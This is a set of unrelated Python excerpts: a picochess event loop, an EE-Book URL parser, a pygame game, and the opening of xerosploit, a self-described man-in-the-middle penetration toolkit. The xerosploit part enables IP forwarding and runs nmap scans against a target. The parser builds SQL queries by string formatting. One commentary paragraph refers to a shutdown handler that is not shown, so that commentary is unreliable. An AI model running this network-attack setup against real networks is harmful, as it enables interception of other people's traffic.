                    game = chess.Board(event.fen, uci960)
                    # see new_game
                    stop_search_and_clock()
                    if engine.has_chess960():
                        engine.option('UCI_Chess960', uci960)
                        engine.send()
                    legal_fens = compute_legal_fens(game)
                    last_legal_fens = []
                    last_computer_fen = None
                    time_control.reset()
                    searchmoves.reset()
                    DisplayMsg.show(Message.START_NEW_GAME(time_control=time_control, game=game.copy()))
                    game_declared = False
                    set_wait_state()
                    break

                if case(EventApi.NEW_GAME):
                    logging.debug('starting a new game with code: {}'.format(event.pos960))
                    uci960 = event.pos960 != 518

                    if game.move_stack:
                        if not (game.is_game_over() or game_declared):
                            DisplayMsg.show(Message.GAME_ENDS(result=GameResult.ABORT, play_mode=play_mode, game=game.copy()))
                    game = chess.Board()
                    if uci960:
                        game.set_chess960_pos(event.pos960)
                    # see setup_position
                    stop_search_and_clock()
                    if engine.has_chess960():
                        engine.option('UCI_Chess960', uci960)
                        engine.send()
                    legal_fens = compute_legal_fens(game)
                    last_legal_fens = []
                    last_computer_fen = None
                    time_control.reset()
                    searchmoves.reset()
                    DisplayMsg.show(Message.START_NEW_GAME(time_control=time_control, game=game.copy()))
                    game_declared = False
                    set_wait_state()
                    break

                if case(EventApi.PAUSE_RESUME):
                    if engine.is_thinking():
                        stop_clock()
                        engine.stop(show_best=True)
                    else:
                        if time_control.is_ticking():
                            stop_clock()
                        else:
                            start_clock()
                    break

                if case(EventApi.ALTERNATIVE_MOVE):
                    if last_computer_fen:
                        last_computer_fen = None
                        game.pop()
                        DisplayMsg.show(Message.ALTERNATIVE_MOVE())
                        think(game, time_control)
                    break

                if case(EventApi.SWITCH_SIDES):
                    if interaction_mode == Mode.NORMAL:
                        user_to_move = False
                        last_legal_fens = []

                        if engine.is_thinking():
                            stop_clock()
                            engine.stop(show_best=False)
                            user_to_move = True
                        if event.engine_finished:
                            last_computer_fen = None
                            move = game.pop()
                            user_to_move = True
                        else:
                            move = chess.Move.null()
                        if user_to_move:
                            last_legal_fens = []
                            play_mode = PlayMode.USER_WHITE if game.turn == chess.WHITE else PlayMode.USER_BLACK
                        else:
                            play_mode = PlayMode.USER_WHITE if game.turn == chess.BLACK else PlayMode.USER_BLACK

                        if not user_to_move and check_game_state(game, play_mode):
                            time_control.reset_start_time()
                            think(game, time_control)
                            legal_fens = []
                        else:
                            start_clock()
                            legal_fens = compute_legal_fens(game)

                        text = dgttranslate.text(play_mode.value)
                        DisplayMsg.show(Message.PLAY_MODE(play_mode=play_mode, play_mode_text=text))

                        if event.engine_finished:
                            DisplayMsg.show(Message.SWITCH_SIDES(move=move))
                    break

                if case(EventApi.DRAWRESIGN):
                    if not game_declared:  # in case user leaves kings in place while moving other pieces
                        stop_search_and_clock()
                        DisplayMsg.show(Message.GAME_ENDS(result=event.result, play_mode=play_mode, game=game.copy()))
                        game_declared = True
                    break

                if case(EventApi.REMOTE_MOVE):
                    if interaction_mode == Mode.REMOTE:
                        handle_move(move=chess.Move.from_uci(event.move))
                        legal_fens = compute_legal_fens(game)
                    break

                if case(EventApi.BEST_MOVE):
                    handle_move(move=event.result.bestmove, ponder=event.result.ponder, inbook=event.inbook)
                    break

                if case(EventApi.NEW_PV):
                    # illegal moves can occur if a pv from the engine arrives at the same time as a user move.
                    if game.is_legal(event.pv[0]):
                        DisplayMsg.show(Message.NEW_PV(pv=event.pv, mode=interaction_mode, fen=game.fen(), turn=game.turn))
                    else:
                        logging.info('illegal move can not be displayed. move:%s fen=%s', event.pv[0], game.fen())
                    break

                if case(EventApi.NEW_SCORE):
                    DisplayMsg.show(Message.NEW_SCORE(score=event.score, mate=event.mate, mode=interaction_mode, turn=game.turn))
                    break

                if case(EventApi.NEW_DEPTH):
                    DisplayMsg.show(Message.NEW_DEPTH(depth=event.depth))
                    break

                if case(EventApi.SET_INTERACTION_MODE):
                    if interaction_mode in (Mode.NORMAL, Mode.OBSERVE, Mode.REMOTE):
                        stop_clock()
                    interaction_mode = event.mode
                    if engine.is_thinking():
                        stop_search()
                    if engine.is_pondering():
                        stop_search()
                    set_wait_state()
                    DisplayMsg.show(Message.INTERACTION_MODE(mode=event.mode, mode_text=event.mode_text, ok_text=event.ok_text))
                    break

                if case(EventApi.SET_OPENING_BOOK):
                    config = ConfigObj('picochess.ini')
                    config['book'] = event.book['file']
                    config.write()
                    logging.debug("changing opening book [%s]", event.book['file'])
                    bookreader = chess.polyglot.open_reader(event.book['file'])
                    DisplayMsg.show(Message.OPENING_BOOK(book_text=event.book_text, ok_text=event.ok_text))
                    break

                if case(EventApi.SET_TIME_CONTROL):
                    time_control = event.time_control
                    config = ConfigObj('picochess.ini')
                    if time_control.mode == TimeMode.BLITZ:
                        config['time'] = '{:d} 0'.format(time_control.minutes_per_game)
                    elif time_control.mode == TimeMode.FISCHER:
                        config['time'] = '{:d} {:d}'.format(time_control.minutes_per_game, time_control.fischer_increment)
                    elif time_control.mode == TimeMode.FIXED:
                        config['time'] = '{:d}'.format(time_control.seconds_per_move)
                    config.write()
                    DisplayMsg.show(Message.TIME_CONTROL(time_text=event.time_text, ok_text=event.ok_text))
                    break

                if case(EventApi.OUT_OF_TIME):
                    stop_search_and_clock()
                    DisplayMsg.show(Message.GAME_ENDS(result=GameResult.OUT_OF_TIME, play_mode=play_mode, game=game.copy()))
                    break

                if case(EventApi.SHUTDOWN):
                    DisplayMsg.show(Message.GAME_ENDS(result=GameResult.ABORT, play_mode=play_mode, game=game.copy()))
                    shutdown(args.dgtpi)
                    break

                if case(EventApi.REBOOT):
                    DisplayMsg.show(Message.GAME_ENDS(result=GameResult.ABORT, play_mode=play_mode, game=game.copy()))
                    reboot()
                    break

                if case(EventApi.EMAIL_LOG):
                    if args.log_file:
                        email_logger = Emailer(net=args.enable_internet, email=args.email, mailgun_key=args.mailgun_key,
                                               smtp_server=args.smtp_server, smtp_user=args.smtp_user,
                                               smtp_pass=args.smtp_pass, smtp_encryption=args.smtp_encryption,
                                               smtp_from=args.smtp_from)
                        body = 'You probably want to forward this file to a picochess developer ;-)'
                        email_logger.send('Picochess LOG', body, '/opt/picochess/logs/{}'.format(args.log_file))
                    break

                if case(EventApi.DGT_BUTTON):
                    DisplayMsg.show(Message.DGT_BUTTON(button=event.button))
                    break

                if case(EventApi.DGT_FEN):
                    DisplayMsg.show(Message.DGT_FEN(fen=event.fen))
                    break

                if case():  # Default
                    logging.warning("event not handled : [%s]", event)

            evt_queue.task_done()
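
A note on the shutdown pattern in this example: the NEW_ENGINE handler escalates from engine.quit() to engine.terminate() to engine.kill(), and only reaches sys.exit(-1) when even the fallback engine fails to start. Below is a minimal sketch of that escalation, assuming a hypothetical engine object whose quit()/terminate()/kill() methods follow the same convention as above (a non-zero return means the call failed):

import logging
import sys

def shutdown_engine(engine):
    """Escalate from polite to forceful shutdown; report success.

    Assumes hypothetical quit()/terminate()/kill() methods that
    return a non-zero code on failure, as in the example above.
    """
    for action in (engine.quit, engine.terminate, engine.kill):
        if not action():  # 0 means the engine actually went away
            return True
    logging.error('engine shutdown failure')
    return False

# The caller decides whether a failed shutdown is fatal, e.g.:
#     if not shutdown_engine(engine):
#         sys.exit(-1)  # no engine left to fall back to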

Example 159

Project: EE-Book Source File: url_parser.py
    @staticmethod
    def parse_command(raw_command=''):
        u"""
        分析单条命令并返回待完成的task
        :param raw_command:   网址原始链接, 如:http://blog.sina.com.cn/u/1287694611
        :return: task
        task格式
        *   kind
            *   字符串,见TypeClass.type_list
        *   spider
            *   href
                *   网址原始链接,例http://www.zhihu.com/question/33578941
                *   末尾没有『/』
        *   book
            *   kind
            *   info
            *   question
            *   answer
        """

        def parse_question(command):
            result = Match.question(command)
            question_id = result.group('question_id')
            task = SingleTask()
            task.kind = 'question'

            task.spider.href = 'https://www.zhihu.com/question/{}'.format(question_id)
            task.book.kind = 'question'
            task.book.sql.info = ' question_id = "{}" '.format(question_id)
            task.book.sql.question = 'question_id = "{}"'.format(question_id)
            task.book.sql.answer = 'question_id = "{}"'.format(question_id)
            return task

        def parse_answer(command):
            result = Match.answer(command)
            question_id = result.group('question_id')
            answer_id = result.group('answer_id')
            task = SingleTask()
            task.kind = 'answer'
            task.spider.href = 'https://www.zhihu.com/question/{}/answer/{}'.format(question_id, answer_id)

            task.book.kind = 'answer'
            task.book.sql.info = ' question_id = "{}" '.format(question_id)
            task.book.sql.question = ' question_id = "{}" '.format(question_id)
            task.book.sql.answer = ' question_id = "{}" and answer_id = "{}" '.format(question_id, answer_id)
            return task

        def parse_author(command):
            result = Match.author(command)
            author_id = result.group('author_id')
            task = SingleTask()
            task.kind = 'author'
            task.spider.href = 'https://www.zhihu.com/people/{}'.format(author_id)
            task.book.kind = 'author'

            client = ZhihuClient()
            try:
                client.load_token(Path.pwd_path + str(u'/ZHIHUTOKEN.pkl'))
            except IOError:
                print u"没有找到登录信息文件,请先登录"
                sys.exit()
            except NeedLoginException:
                print u"登录信息过期,请重新登录"
                sys.exit()
            people_oauth = client.people(author_id)
            _ = people_oauth.follower_count    # zhihu-oauth, issues #4
            author_id_hash = people_oauth.id
            task.book.sql.info = 'select * from AuthorInfo where author_id = "{}"'.format(author_id_hash)
            task.book.sql.question = 'select * from Question where question_id in (select question_id from \
            Answer where author_id = "{}")'.format(author_id_hash)
            task.book.sql.answer = 'select * from Answer where author_id = "{}"'.format(author_id_hash)
            return task

        def parse_collection(command):
            result = Match.collection(command)
            collection_id = result.group('collection_id')
            task = SingleTask()
            task.kind = 'collection'
            task.spider.href = 'https://www.zhihu.com/collection/{}'.format(collection_id)
            task.book.kind = 'collection'
            task.book.sql.info = 'select * from CollectionInfo where collection_id = "{}"'.format(
                collection_id
            )
            task.book.sql.question = 'select * from Question where question_id in (select question_id from \
            Answer where href in (select href from CollectionIndex where collection_id = "{}"))'.format(collection_id)
            task.book.sql.answer = 'select * from Answer where href in (select href from \
            CollectionIndex where collection_id = "{}")'.format(collection_id)
            return task

        def parse_topic(command):
            result = Match.topic(command)
            topic_id = result.group('topic_id')
            task = SingleTask()
            task.kind = 'topic'
            task.spider.href = 'https://www.zhihu.com/topic/{}'.format(topic_id)
            task.book.kind = 'topic'
            task.book.sql.info = 'select * from TopicInfo where topic_id = "{}"'.format(topic_id)
            task.book.sql.question = 'select * from Question where question_id in (select question_id from ' + \
                'Answer where href in (select href from TopicIndex where topic_id = "{}"))'.format(topic_id)
            task.book.sql.answer = 'select * from Answer where href in (select href from ' + \
                'TopicIndex where topic_id = "{}")'.format(topic_id)
            return task

        def parse_article(command):
            result = Match.article(command)
            column_id = result.group('column_id')
            article_id = result.group('article_id')
            task = SingleTask()
            task.kind = 'article'
            task.spider.href = 'https://zhuanlan.zhihu.com/{}/{}'.format(column_id, article_id)
            task.book.kind = 'article'
            task.book.sql.info = ' column_id = "{}" and article_id = "{}" '.format(column_id, article_id)
            task.book.sql.question = ''
            task.book.sql.answer = ' column_id = "{}" and article_id = "{}" '.format(column_id, article_id)
            return task

        def parse_column(command):
            result = Match.column(command)
            column_id = result.group('column_id')
            task = SingleTask()
            task.kind = 'column'
            task.spider.href = 'https://zhuanlan.zhihu.com/{}'.format(column_id)
            task.book.kind = 'column'
            task.book.sql.info = 'select * from ColumnInfo where column_id = "{}" '.format(column_id)
            task.book.sql.question = ''
            task.book.sql.answer = 'select * from Article where column_id = "{}" '.format(column_id)
            return task

        def parse_sinablog_author(command):
            u"""

            :param command: 某个新浪博客博主的首页地址
            :return: task:
            """
            result = Match.sinablog_author(command)
            sinablog_author_id = result.group('sinablog_people_id')
            Debug.logger.debug(u"sinablog_people_id:" + str(sinablog_author_id))
            task = SingleTask()

            task.author_id = sinablog_author_id
            task.kind = 'sinablog_author'
            task.spider.href_article_list = 'http://blog.sina.com.cn/s/articlelist_{}_0_1.html'.\
                format(sinablog_author_id)
            task.spider.href = 'http://blog.sina.com.cn/u/{}'.format(sinablog_author_id)
            task.spider.href_profile = 'http://blog.sina.com.cn/s/profile_{}.html'.format(sinablog_author_id)
            task.book.kind = 'sinablog_author'
            task.book.sql.info_extra = 'creator_id = "{}"'.format(sinablog_author_id)
            task.book.sql.article_extra = 'author_id = "{}"'.format(sinablog_author_id)
            task.book.author_id = sinablog_author_id
            return task

        def parse_jianshu_author(command):
            u"""

            :param command: homepage of someone, e.g. http://www.jianshu.com/users/b1dd2b2c87a8/latest_articles
            :return: task:
            """
            result = Match.jianshu_author(command)
            jianshu_id = result.group('jianshu_id')

            task = SingleTask()
            task.author_id = jianshu_id
            task.kind = 'jianshu_author'
            task.spider.href = 'http://www.jianshu.com/users/{}/latest_articles'.format(jianshu_id)
            task.book.kind = 'jianshu_author'
            task.book.sql.info_extra = 'creator_id = "{}"'.format(jianshu_id)
            task.book.sql.article_extra = 'author_id = "{}"'.format(jianshu_id)
            task.book.author_id = jianshu_id
            return task

        def parse_jianshu_collection(command):
            result = Match.jianshu_collection(command)
            collection_id = result.group('collection_id')
            task = SingleTask()
            task.kind = 'jianshu_collection'
            task.spider.href = 'http://www.jianshu.com/collection/{}'.format(collection_id)
            task.book.kind = 'jianshu_collection'
            task.book.sql.info = 'select * from jianshu_collection_info where collection_fake_id = "{}"'.format(
                collection_id
            )
            task.book.sql.answer = 'select * from jianshu_article where href in (select href from ' + \
                'jianshu_collection_index where collection_fake_id = "{}")'.format(collection_id)
            return task

        def parse_jianshu_notebooks(command):
            result = Match.jianshu_notebooks(command)
            notebooks_id = result.group('notebooks_id')
            task = SingleTask()
            task.kind = 'jianshu_notebooks'
            task.spider.href = 'http://www.jianshu.com/notebooks/{}/latest'.format(notebooks_id)  # config file???
            task.book.kind = 'jianshu_notebooks'
            task.book.sql.info = 'select * from jianshu_notebooks_info where notebooks_id = "{}"'.format(
                notebooks_id
            )
            task.book.sql.answer = 'select * from jianshu_article where href in (select href from ' + \
                'jianshu_notebooks_index where notebooks_id = "{}")'.format(notebooks_id)
            return task

        def parse_cnblogs_author(command):
            u"""

            :param command: home page, e.g. http://www.cnblogs.com/buptzym/
            :return:
            """
            result = Match.cnblogs_author(command)
            cnblogs_author_id = result.group('cnblogs_id')
            task = SingleTask()
            task.kind = 'cnblogs_author'
            task.spider.href = 'http://www.cnblogs.com/{}/'.format(cnblogs_author_id)
            task.book.kind = 'cnblogs_author'
            task.book.sql.info = 'select * from cnblogs_author_info where creator_id = "{}"'.format(cnblogs_author_id)
            task.book.sql.answer = 'select * from cnblogs_article where author_id = "{}"'.format(cnblogs_author_id)
            # task.book.sql.info_extra = 'creator_id = "{}"'.format(cnblogs_author_id)
            # task.book.sql.article_extra = 'author_id = "{}"'.format(cnblogs_author_id)
            task.book.author_id = cnblogs_author_id
            return task

        def parse_csdnblog_author(command):
            u"""

            :param command: homepage of someone, e.g. http://blog.csdn.net/elton_xiao
            :return: task
            """
            result = Match.csdnblog_author(command)
            csdnblog_author_id = result.group('csdnblog_author_id')

            task = SingleTask()
            task.author_id = csdnblog_author_id     # ??? don't need?
            task.kind = 'csdnblog_author'
            task.spider.href = 'http://blog.csdn.net/{}'.format(csdnblog_author_id)
            task.book.kind = 'csdnblog_author'
            task.book.sql.info_extra = 'creator_id = "{}"'.format(csdnblog_author_id)
            task.book.sql.article_extra = 'author_id = "{}"'.format(csdnblog_author_id)
            task.book.author_id = csdnblog_author_id
            return task

        def parse_generic(command):
            u"""

            :param command:
            :return:
            """
            from .tools.type import Type
            task = SingleTask()
            for command_type in Type.type_list:
                result = getattr(Match, command_type)(command)
                if result:
                    task.author_id = result.group('subject_id')
                    task.kind = command_type
            task.spider.href = command
            task.book.kind = task.kind
            task.book.sql.info = 'select * from generic_info where creator_id = "{}"'.format(command)
            task.book.sql.answer = 'select * from generic_article where author_id = "{}"'.format(command)
            task.book.author_id = task.spider.href
            return task

        def parse_error(command):
            if command:
                Debug.logger.info(u"""Could not analysis:{}, please check it out and try again。""".format(command))
            return

        parser = {
            'answer': parse_answer,
            'question': parse_question,
            'author': parse_author,
            'collection': parse_collection,
            'topic': parse_topic,
            'article': parse_article,
            'column': parse_column,
            'sinablog_author': parse_sinablog_author,
            'cnblogs_author': parse_cnblogs_author,
            'jianshu_author': parse_jianshu_author,
            'jianshu_collection': parse_jianshu_collection,
            'jianshu_notebooks': parse_jianshu_notebooks,
            'csdnblog_author': parse_csdnblog_author,
            'yiibai': parse_generic,
            'talkpython': parse_generic,
            'unknown': parse_error,
        }

        kind = Match.detect_recipe_kind(raw_command)
        return parser[kind](raw_command)
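
The dispatch-table pattern above (a dict mapping the detected kind to a parser function, with sys.exit() reserved for unrecoverable states such as missing login credentials) is easy to reuse. Here is a self-contained sketch of the same idea; the kind detection is a deliberately simplified stand-in for Match.detect_recipe_kind:

import sys

def parse_question(command):
    return {'kind': 'question', 'href': command}

def parse_error(command):
    # sys.exit(msg) prints msg to stderr and exits with status 1,
    # so a separate print + sys.exit(1) pair is not required.
    sys.exit(u"Could not analyze: {}".format(command))

PARSERS = {
    'question': parse_question,
    'unknown': parse_error,
}

def parse_command(raw_command):
    # stand-in for Match.detect_recipe_kind
    kind = 'question' if '/question/' in raw_command else 'unknown'
    return PARSERS[kind](raw_command)

print(parse_command('https://www.zhihu.com/question/33578941'))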

Example 160

Project: Hermit Source File: foo.py
def main():
	global x, lspds, locs, gamestart, landloc, landni, fullscreen, birds, terrain, keyseq, T
	gamestart = True
	showconsole  = False
	while 1:
		canvas.fill([240,240,240])
		for event in pygame.event.get():
			if event.type == pygame.QUIT: sys.exit()
			man.keyupdowncontrol(event,horse)

			if event.type == pygame.KEYDOWN:
				if showconsole:
					k = pygame.key.name(event.key)
					#print k
					if k == "return":
						exe("".join(keyseq))
						showconsole = False
					elif k == "space":
						keyseq.append(" ")
					elif k == "-":
						keyseq.append("-")
					elif len(k) == 1:
						keyseq.append(k)
					elif event.key == pygame.K_BACKSPACE :
						if len(keyseq) > 0:
							keyseq.pop()

				if event.key == pygame.K_SLASH:
					showconsole = not showconsole
					if showconsole:
						settings.msg = ["CONSOLE READY.",settings.msgt]
					else:
						settings.msg = ["",settings.msgt]
					keyseq = []
				if event.key == pygame.K_f and not showconsole:
					fullscreen = not fullscreen
					if fullscreen:
						pygame.display.set_mode([width/2,height+50],pygame.FULLSCREEN)
					else:
						pygame.display.set_mode([width/2,height+50])
					pygame.display.set_caption("")
		#print(pygame.key.get_pressed())
		for i in range(0,len(Ls)):
			if i == 2:
				for c in cranes:
					c.draw(canvas)
			if i == 3:#+terrain:
				"""
				gfont.s = 10

				gfont.w = 1
				gfont.color = (120,120,120)

				gfont.drawStr(canvas,"Hermit",300-x*0.7,260)

				gfont.s = 5
				gfont.w = 1
				gfont.color = (120,120,120)
				gfont.drawStr(canvas,"by lingdong",450-x*0.7,280)

			"""
				for d in deers:
					d.draw(canvas)

				horse.draw(canvas)
				man.draw(canvas)
				for a in arrows:
					a.draw(canvas)
				for b in birds:
					b.simpDraw(canvas)

				pctrl.draw(canvas)

			if Ls[i] != None:
				canvas.blit(Ls[i],[locs[i]-x*lspds[i]-buff,0])

			if locs[i]-x*lspds[i] < -width-buff:
				locs[i] += width*2
				Ls[i] = None
				thread.start_new_thread(mt,(1, i))


			if Lrs[i] != None:
				canvas.blit(Lrs[i],[locrs[i]-x*lspds[i]-buff,0])

			if locrs[i]-x*lspds[i] < -width-buff:
				locrs[i] += width*2
				Lrs[i] = None
				thread.start_new_thread(mt,(2, i))
		clock.tick()
		T += 1
		u.text(canvas,10,10,"FPS: %.1f" % clock.get_fps(),(160,160,160))

		man.keyholdcontrol()

		if (0 or pygame.key.get_pressed()[pygame.K_RIGHT]) and not man.status[0].endswith("ing"):
			for a in arrows:
				a.x -= SPEED
			for b in birds:
				b.x -= SPEED
			for p in pctrl.particles:
				p.x -= SPEED
			for d in deers:
				d.x-=SPEED*0.5
			for c in cranes:
				c.x-=SPEED
			x+=SPEED
			horse.walk()

			if random.random()<0.0005:
				makeBirds(random.randrange(6,12))
			if random.random() < 0.0005 and terrain[3] == 0:
				makeDeers(1)
			if random.random() < 0.001 and terrain[3] == 1:
				makeCranes(random.randrange(1,5))


		else:
			horse.rest()


		u.polygon(canvas,(130,130,130),[[0,height]]+[[landloc-x+i*landDensity,height-land[i]] for i in range(0,len(land))]+[[width/2,height]])


		if -x+landloc<-landDensity:
			landni += 1
			land.append(makeLand(landni,maxheight=20+terrain[3]*120))
			land.pop(0)
			landloc += landDensity


		man.yo = height-20-onLandY(man.x)
		horse.yo = height-30-onLandY(horse.x)



		for d in deers:

			d.yo = height-30-onLandY(max(min(d.x,width/2),0))

			if noise.noise(T*0.001,deers.index(d))<0.5:
				d.x -= d.spd
				d.walk()
			else:
				d.rest()

			if d.x<-100:
				deers.remove(d)

		for c in cranes:
			c.x -= 2*c.s
			c.fly()
			if c.x<-100:
				cranes.remove(c)


		for a in arrows:
			#a.fly()
			#print(a.x)
			if a.x > width/2 or a.x < -10 or height-onLandY(a.x) >= a.calcHead()[1]:
				a.fly()
			else:
				a.v[0] = 0
				a.v[1] = 0
				a.flicker = 0
			if a.x > width/2:
				arrows.remove(a)

		for b in birds:
			if b.health > 0:
				if ((abs(man.x - b.x) < 100 and random.random()<0.05) or random.random()<0.0002) and b.on == 0:
					b.on = 1
					ra = math.pi/20.0+random.random()*math.pi/6.0*2.1
					rl = random.choice([3,4,5])
					b.v=[rl*math.cos(ra),-rl*math.sin(ra)]
				if b.on == 1:
					b.simpFly()

					if abs(man.x - b.x) > 160 and random.random()<1:
						b.v[1] = min(b.v[1]+0.05,0.4)
					if b.y >= 2:
						b.on = 0

				else:
					b.rest()
					if 0 < b.x < width/2:
						b.yo=height-3-onLandY(b.x)

				for a in arrows:
					#print(u.dist(a.x,a.y,b.x,b.y+b.yo))
					if u.dist(a.x,a.y,b.x,b.y+b.yo) < b.s*30 and a.v[0] > 0:
						a.v[0]/= 2
						b.arrow = a
						b.health = 0
						b.x = a.calcFeather()[0]
						b.y = a.calcFeather()[1] - b.yo
						for i in range(0,12):
							pctrl.particles.append(particle.Particle(a.calcFeather()[0],a.calcFeather()[1],[8*(random.random()-0.5),8*(random.random()-0.3)]))

				if b.x<0 or b.x>width or b.yo<0:
					birds.remove(b)
			else:
				b.fall()
		pctrl.emit()


		man.animate()
		horse.animate()
		#array = []
		#screen.unlock()
		screen.blit(canvas,[0,0])



		reflection = canvas#pygame.transform.flip(canvas,False,True)
		pygame.draw.rect(screen,(180,180,180),[0,height,width/2,50])
		for i in range(0,2*(screen.get_height()-height),2):
			screen.blit(reflection,[(math.sin(i*0.5))*i*0.5+(noise.noise(pygame.time.get_ticks()*0.001,i*0.2)-0.5)*20,height+i-1],(0,height-i,width/2,1))



		if settings.msg[0] != "":
			screen.blit(box,[5,height+33-showconsole*20])
			u.text(screen,10,height+35-showconsole*20,settings.msg[0],(240,240,240))


		if settings.msg[1] <= 0 and not showconsole:
			settings.msg[0] = ""
		else:
			settings.msg[1]-=1

		if showconsole:
			input = "".join(keyseq)
			u.text(screen,10,height+25,">"+input.lower(),(240,240,240))
			u.text(screen,10,height+35," "+" | ".join(parse.parse(input.split("-")[0],commandlist)[:3]),(240,240,240))
		array = [pygame.surfarray.pixels_red(screen),pygame.surfarray.pixels_green(screen),pygame.surfarray.pixels_blue(screen)]
		filter.filter(array,T)
		array = []

		#icon.blit(screen,[0,0],[0,0,512,512])
		#pygame.display.set_icon(icon)
		pygame.display.flip()
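
The line near the top of this loop that calls sys.exit() directly from the pygame.QUIT handler is the standard way to leave a pygame main loop. A stripped-down, runnable sketch of just that skeleton (assuming only that pygame is installed); calling pygame.quit() first releases the display before the interpreter exits:

import sys
import pygame

pygame.init()
screen = pygame.display.set_mode((320, 240))
clock = pygame.time.Clock()

while True:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()  # shut the display down cleanly
            sys.exit()     # raises SystemExit to unwind the loop
    screen.fill((240, 240, 240))
    pygame.display.flip()
    clock.tick(60)  # cap the frame rate at 60 FPS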

Example 161

Project: xerosploit Source File: xerosploit.py
def main():
	try:

# Configure the network interface and gateway.
		def config0():
			global up_interface
			up_interface = open('/opt/xerosploit/tools/files/iface.txt', 'r').read()
			up_interface = up_interface.replace("\n","")
			if up_interface == "0":
				up_interface = os.popen("route | awk '/Iface/{getline; print $8}'").read()
				up_interface = up_interface.replace("\n","")

			global gateway
			gateway = open('/opt/xerosploit/tools/files/gateway.txt', 'r').read()
			gateway = gateway.replace("\n","")
			if gateway == "0":
				gateway = os.popen("ip route show | grep -i 'default via'| awk '{print $3 }'").read()
				gateway = gateway.replace("\n","")




		def home():

			config0()
			n_name = os.popen('iwgetid -r').read() # Get wireless network name
			n_mac = os.popen("ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}' | cut -f1  -d'/'").read() # Get network mac
			n_ip = os.popen("hostname -I").read() # Local IP address
			n_host = os.popen("hostname").read() # hostname


# Show a random banner. Configured in banner.py.
			print (xe_header())

			print ("""
[+]═══════════[ Author : @LionSec1 \033[1;36m_-\|/-_\033[1;m Website: lionsec.net ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]""")

			print(""" \033[1;36m
┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █ 
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘     \n \033[1;m""")

			# Print the network configuration as a table, using tabulate.

			table = [["IP Address","MAC Address","Gateway","Iface","Hostname"],
					 ["","","","",""],
					 [n_ip,n_mac.upper(),gateway,up_interface,n_host]]
			print (tabulate(table, stralign="center",tablefmt="fancy_grid",headers="firstrow"))
			print ("")



			# Print xerosploit's short description as a table, using terminaltables.
			table_datas = [
			    ['\033[1;36m\nInformation\n', 'XeroSploit is a penetration testing toolkit whose goal is to \nperform man in the middle attacks for testing purposes. \nIt brings various modules that allow to realise efficient attacks.\nThis tool is Powered by Bettercap and Nmap.\033[1;m']
			]
			table = DoubleTable(table_datas)
			print(table.table)


		# Get a list of all currently connected devices, using Nmap.
		def scan(): 
			config0()


			scan = os.popen("nmap " + gateway + "/24 -n -sP ").read()

			f = open('/opt/xerosploit/tools/log/scan.txt','w')
			f.write(scan)
			f.close()

			devices = os.popen(" grep report /opt/xerosploit/tools/log/scan.txt | awk '{print $5}'").read()

			devices_mac = os.popen("grep MAC /opt/xerosploit/tools/log/scan.txt | awk '{print $3}'").read() + os.popen("ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}' | cut -f1  -d'/'").read().upper() # get devices mac and localhost mac address

			devices_name = os.popen("grep MAC /opt/xerosploit/tools/log/scan.txt | awk '{print $4 ,S$5 $6}'").read() + "\033[1;32m(This device)\033[1;m"

			
			table_data = [
			    ['IP Address', 'Mac Address', 'Manufacturer'],
			    [devices, devices_mac, devices_name]
			]
			table = DoubleTable(table_data)

			# Show devices found on your network
			print("\033[1;36m[+]═══════════[ Devices found on your network ]═══════════[+]\n\033[1;m")
			print(table.table)
			target_ip()



		# Set the target IP address.
		def target_ip():
			target_parse = " --target "  # Bettercap target flag. This variable is cleared if the user wants to run the MITM attack on the whole network.

			print ("\033[1;32m\n[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.\n\033[1;m")
			target_ips = raw_input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip()
			
			if target_ips == "back":
				home()
			elif target_ips == "home":
				home()
			elif target_ips == "":
				print ("\033[1;91m\n[!] Please specify a target.\033[1;m") # error message if no target are specified. 
				target_ip()
			target_name = target_ips

			

#modules section
			def program0():
				
				# I have separated target_ip() and program0() to avoid an endless loop when the user chooses the "all" option
				cmd_target = os.popen("bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'").read() # IP forwarding
				print("\033[1;34m\n[++] " + target_name + " has been targeted. \033[1;m")
				def option():
					""" Choose a module """
					print("\033[1;32m\n[+] Which module do you want to load ? Enter 'help' for more information.\n\033[1;m")
					options = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m\033[1;36m ➮ \033[1;m").strip() # select an option , port scan , vulnerability scan .. etc...
					# Port scanner
					if options == "pscan":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         Port Scanner                         █
█                                                              █
█      Find open ports on network computers and retrieve       █
█     versions of programs running on the detected ports       █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def pscan():
							

							if target_ips == "" or "," in target_ips:
								print("\033[1;91m\n[!] Pscan : You must specify only one target host at a time .\033[1;m")
								option()
							

							print("\033[1;32m\n[+] Enter 'run' to execute the 'pscan' command.\n\033[1;m")
							action_pscan = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mpscan\033[0m\033[1;36m ➮ \033[1;m").strip()#ip to scan
							if action_pscan == "back":
								option()
							elif action_pscan == "exit":
								sys.exit(exit_msg)	
							elif action_pscan == "home":
								home()

								pscan()
							elif action_pscan == "run": 
								print("\033[1;34m\n[++] Please wait ... Scanning ports on " + target_name + " \033[1;m")
								scan_port = os.popen("nmap "+ target_ips + " -Pn" ).read()

								save_pscan = open('/opt/xerosploit/tools/log/pscan.txt','w') # Save scanned ports result.
								save_pscan.write(scan_port)
								save_pscan.close()

								# Grep port scan information
								ports = os.popen("grep open /opt/xerosploit/tools/log/pscan.txt | awk '{print $1}'" ).read().upper() # open ports
								ports_services = os.popen("grep open /opt/xerosploit/tools/log/pscan.txt | awk '{print $3}'" ).read().upper() # open ports services
								ports_state = os.popen("grep open /opt/xerosploit/tools/log/pscan.txt | awk '{print $2}'" ).read().upper() # port state



								# Show the result of port scan

								check_open_port = os.popen("grep SERVICE /opt/xerosploit/tools/log/pscan.txt | awk '{print $2}'" ).read().upper() # check whether all ports are closed in the result
								if check_open_port == "STATE\n": 

									table_data = [
										['SERVICE', 'PORT', 'STATE'],
										[ports_services, ports, ports_state]
